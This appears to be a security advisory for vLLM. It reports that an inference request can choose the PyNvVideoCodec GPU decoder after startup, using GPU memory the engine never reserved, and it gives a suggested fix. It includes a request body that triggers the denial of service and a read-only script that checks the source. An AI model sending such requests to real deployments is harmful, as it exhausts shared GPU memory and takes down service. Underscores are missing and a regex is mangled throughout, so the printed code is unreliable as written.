PT-2026-105921 · Pypi · Vllm
Publicado
2026-10-01
·
Atualizado
2026-10-01
CVSS v3.1
6.5
Média
| Vetor | AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H |
Summary
Current vLLM
main lets an inference request choose the PyNvVideoCodec GPU video decoder through media io kwargs.video.video backend, but engine GPU memory reservation is computed only from static startup configuration and VLLM VIDEO LOADER BACKEND. If the server starts with the default OpenCV/software backend and no --mm-ipc-gpu-memory-gb budget, a client can still route a video request into the PyNvVideoCodec path after startup, causing frontend CUDA-context, decoder-surface, and decoded-frame GPU allocations that were not carved out of the engine KV-cache budget.Technical Details
The vulnerable boundary is the split between request-time media decoding choices in the API server and startup-time memory budgeting in the engine worker. Request bodies for Chat Completions and Responses expose
media io kwargs, and those values are forwarded to the shared media connector. For video inputs, MediaConnector.fetch video() copies self.media io kwargs["video"] into video io kwargs, only setting a model-derived backend when video backend is absent. VideoMediaIO. init () then consumes video backend from those kwargs and loads that backend from VIDEO LOADER REGISTRY.The relevant request-side source path is:
python
video io kwargs = dict(self.media io kwargs.get("video", {}))
if "video backend" not in video io kwargs and (
video backend := get video loader backend for processor(video processor)
):
video io kwargs["video backend"] = video backend
video io = VideoMediaIO(image io, **video io kwargs)python
video loader backend = (
kwargs.pop("video backend", None) or envs.VLLM VIDEO LOADER BACKEND
)
self.video loader = VIDEO LOADER REGISTRY.load(video loader backend)VideoBackend.load bytes() then dispatches backend == "pynvvideocodec" into decode frames pynvvideocodec(), which constructs a PyNvVideoCodec decoder, creates or uses a CUDA stream, reads stream metadata, decodes selected frames on the GPU, and copies those frames into pinned host memory. The new frontend GPU memory pool accounts only for raw decoded frame bytes when a pool exists; it does not make request-time backend selection safe when no startup reservation was made.The engine-side reservation code makes its decision from static model config and environment only:
python
def uses pynvvideocodec video backend(mm config) -> bool:
video kwargs = mm config.media io kwargs.get("video", {})
video loader backend = (
video kwargs.get("video backend") or envs.VLLM VIDEO LOADER BACKEND
)
codec backend = video kwargs.get("backend")
return (
video loader backend == PYNVVIDEOCODEC VIDEO BACKEND
or codec backend == PYNVVIDEOCODEC VIDEO BACKEND
)python
decoder reserved bytes = (
num api servers * per server decoder bytes
if self. uses pynvvideocodec video backend(mm config)
else 0
)
reserved bytes = raw frame reserved bytes + decoder reserved bytes
if reserved bytes <= 0:
return available kv cache memory bytesWith default static video configuration,
mm config.media io kwargs["video"] does not name PyNvVideoCodec and VLLM VIDEO LOADER BACKEND defaults to OpenCV/software decoding. The worker therefore reserves no PyNv decoder/CUDA-context bytes. A later request can still set media io kwargs.video.video backend="pynvvideocodec" and reach the GPU decoder path because that runtime field is intentionally honored by VideoMediaIO.PoV
An ordinary multimodal inference request can carry the backend override in the request body:
json
{
"model": "served-vlm",
"messages": [
{
"role": "user",
"content": [
{"type": "text", "text": "summarize this clip"},
{"type": "video url", "video url": {"url": "data:video/mp4;base64,<small-mp4>"}}
]
}
],
"media io kwargs": {
"video": {
"video backend": "pynvvideocodec"
}
}
}The following bounded source-level check confirms the code path without allocating GPU memory:
bash
git clone --filter=blob:none https://github.com/vllm-project/vllm.git
cd vllm
git checkout ddd3855a28a561a5bb54d380c6e6b8b1e883cc4a
python3 check pynv backend reservation.py --repo .PoC
The bounded check validates current source markers, simulates the exact static reservation predicate, and compares vulnerable and negative-control configurations. Key output:
json
{
"vulnerable": true,
"head": "ddd3855a28a561a5bb54d380c6e6b8b1e883cc4a",
"reservation simulation": {
"env video loader backend": "opencv",
"request selects pynv after startup": true,
"vulnerable static reserved bytes": 0,
"negative control static pynv reserved bytes": 2066953011,
"raw frame only control reserved bytes": 268435456,
"unreserved decoder bytes when only request selects pynv": 2066953011
}
}The negative control is important: when PyNvVideoCodec is selected statically, the worker reserves
2066953011 bytes per API process for decoder surfaces plus CUDA context. The vulnerable case reserves 0 bytes for the same decoder overhead because PyNvVideoCodec is selected only by the later request. A second control with static OpenCV plus mm ipc gpu memory gb=0.25 reserves only the raw-frame semaphore budget and still does not reserve PyNv decoder/CUDA-context bytes.Impact
An attacker who can submit video requests to a vLLM deployment with PyNvVideoCodec available can force frontend GPU decoding even when the engine did not reserve memory for that decoder during startup. On high-utilization serving deployments, the unreserved CUDA context, retained decoder surfaces, and decoded-frame allocations can reduce or exhaust GPU memory that the engine assumed was available for weights, activations, or KV cache, causing request failures, worker crashes, or service-level denial of service.
Suggested severity is Medium with conservative CVSS v3.1
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H (6.5). If a deployment exposes the affected API without authentication, PR:N would raise the deployment-specific score. Suggested weaknesses are CWE-770 (Allocation of Resources Without Limits or Throttling) and CWE-400 (Uncontrolled Resource Consumption). This should not be rated Low because the affected resource is shared GPU memory in the serving path and the code already treats the PyNv decoder/CUDA-context footprint as large enough to reserve at startup when statically configured.Limitations: exploitation requires a GPU deployment where PyNvVideoCodec is installed and usable, and the request must reach a video-capable model/path. The issue does not claim code execution, data disclosure, or SSRF.
Suggested Fix
Do not allow untrusted request fields to select a GPU decoder that was not included in startup memory reservation. The simplest fix is to reject request-level
media io kwargs.video.video backend="pynvvideocodec" unless the static server configuration already selected PyNvVideoCodec and reserved its decoder/CUDA-context budget.If dynamic backend selection remains supported, split software and GPU decoder policies: allow request selection among CPU/software decoders only, require an explicit operator allowlist for GPU decoders, and include every request-selectable GPU decoder in the startup reservation predicate. Add regression coverage for static OpenCV startup config plus request-level PyNvVideoCodec override, and preserve the negative control where static PyNvVideoCodec configuration reserves decoder/CUDA-context bytes.
Affected Package/Versions
Package:
vllm from vllm-project/vllm.Confirmed affected: current
main at ddd3855a28a561a5bb54d380c6e6b8b1e883cc4a.Introduced by:
af16446bf39de047ab57649c933063cf1cbf1e50, Vram semaphore infra (#44465), committed 2026-06-26T17:32:51-07:00.Release status checked:
git tag --contains af16446bf returned no release tags in the fresh checkout. GitHub repository metadata reported latest published release v0.23.0 published 2026-06-15T05:27:20Z; the local v0.24.0 tag also does not contain the introducing commit. The affected range should therefore be current main builds containing af16446bf until fixed, rather than a confirmed released-version range.Advisory History
Public vLLM advisories checked included audio decompression-bomb DoS, unbounded
video/jpeg frame-count DoS, MediaConnector SSRF, video processing RCE, multimodal embedding DoS/RCE, GGUF GPU memory exposure, multimodal hashing, and other request-parameter DoS classes. None matched request-selected PyNvVideoCodec or the static VRAM reservation mismatch.Prior local/private vLLM report families checked included request-level
media io kwargs reopening video/jpeg frame fanout, GLM video metadata amplification, and audio media decode duration-limit bypass. Those reports share the request-level media kwargs boundary, but they target CPU/media decode limits or model metadata amplification. This report targets a different privileged asset and fix surface: GPU decoder selection after engine startup memory reservation.Focused GitHub issue/PR searches for
pynvvideocodec, mm ipc gpu memory, video backend media io kwargs, Vram semaphore infra, and frontend multimodal GPU decoding found the PyNvVideoCodec zero-copy RFC, an old do-not-review prototype, merged PR #44465, and an unrelated TorchCodec backend PR. No public issue or PR described this security boundary.Appendix: Bounded Source-Level Check
python
#!/usr/bin/env python3
from future import annotations
import argparse
import json
import re
import subprocess
from pathlib import Path
MIB = 1024 * 1024
GIB = 1024 * MIB
def read(repo: Path, rel: str) -> str:
return (repo / rel).read text(encoding="utf-8")
def const int(source: str, name: str) -> int:
expr = re.search(rf"^{name}s*=s*(.+)$", source, flags=re.MULTILINE).group(1).strip()
if expr == "128 * MiB bytes":
return 128 * MIB
if expr == "int(1.8 * 1024 * MiB bytes)":
return int(1.8 * 1024 * MIB)
if expr == "1":
return 1
raise AssertionError(expr)
def uses pynv static(static media io kwargs: dict[str, dict[str, str]], env backend: str) -> bool:
video kwargs = static media io kwargs.get("video", {})
video loader backend = video kwargs.get("video backend") or env backend
codec backend = video kwargs.get("backend")
return video loader backend == "pynvvideocodec" or codec backend == "pynvvideocodec"
def reserve bytes(static media io kwargs, env backend, mm ipc gpu memory gb, decoder bytes, cuda context bytes, retained decoders):
raw frame reserved bytes = int(mm ipc gpu memory gb * GIB)
per server decoder bytes = decoder bytes * retained decoders + cuda context bytes
decoder reserved bytes = per server decoder bytes if uses pynv static(static media io kwargs, env backend) else 0
return raw frame reserved bytes + decoder reserved bytes
parser = argparse.ArgumentParser()
parser.add argument("--repo", required=True, type=Path)
repo = parser.parse args().repo.resolve()
media video = read(repo, "vllm/multimodal/media/video.py")
connector = read(repo, "vllm/multimodal/media/connector.py")
chat protocol = read(repo, "vllm/entrypoints/openai/chat completion/protocol.py")
responses protocol = read(repo, "vllm/entrypoints/openai/responses/protocol.py")
gpu worker = read(repo, "vllm/v1/worker/gpu worker.py")
video core = read(repo, "vllm/multimodal/video.py")
assert "media io kwargs: dict[str, dict[str, Any]] | None = Field(" in chat protocol
assert "media io kwargs: dict[str, dict[str, Any]] | None = Field(" in responses protocol
assert 'video io kwargs = dict(self.media io kwargs.get("video", {}))' in connector
assert 'if "video backend" not in video io kwargs and (' in connector
assert 'kwargs.pop("video backend", None) or envs.VLLM VIDEO LOADER BACKEND' in media video
assert "elif backend == PYNVVIDEOCODEC VIDEO BACKEND:" in video core
assert 'video kwargs = mm config.media io kwargs.get("video", {})' in gpu worker
decoder bytes = const int(video core, "PYNVVIDEOCODEC DECODER GPU MEMORY BYTES")
retained decoders = const int(video core, "PYNVVIDEOCODEC MAX RETAINED DECODERS")
cuda context bytes = const int(video core, "PYNVVIDEOCODEC CUDA CONTEXT BYTES")
per server decoder bytes = decoder bytes * retained decoders + cuda context bytes
vulnerable static reserved = reserve bytes({}, "opencv", 0.0, decoder bytes, cuda context bytes, retained decoders)
negative control reserved = reserve bytes({"video": {"video backend": "pynvvideocodec"}}, "opencv", 0.0, decoder bytes, cuda context bytes, retained decoders)
raw frame only control = reserve bytes({}, "opencv", 0.25, decoder bytes, cuda context bytes, retained decoders)
head = subprocess.check output(["git", "-C", str(repo), "rev-parse", "HEAD"], text=True).strip()
print(json.dumps({
"head": head,
"vulnerable": vulnerable static reserved == 0 and negative control reserved == per server decoder bytes,
"reservation simulation": {
"env video loader backend": "opencv",
"request selects pynv after startup": True,
"vulnerable static reserved bytes": vulnerable static reserved,
"negative control static pynv reserved bytes": negative control reserved,
"raw frame only control reserved bytes": raw frame only control,
"unreserved decoder bytes when only request selects pynv": per server decoder bytes,
},
}, indent=2, sort keys=True))Correção
Encontrou algum problema na descrição? Tem algo a acrescentar? Fique à vontade para nos escrever 👾
Identificadores relacionados
Produtos afetados
Vllm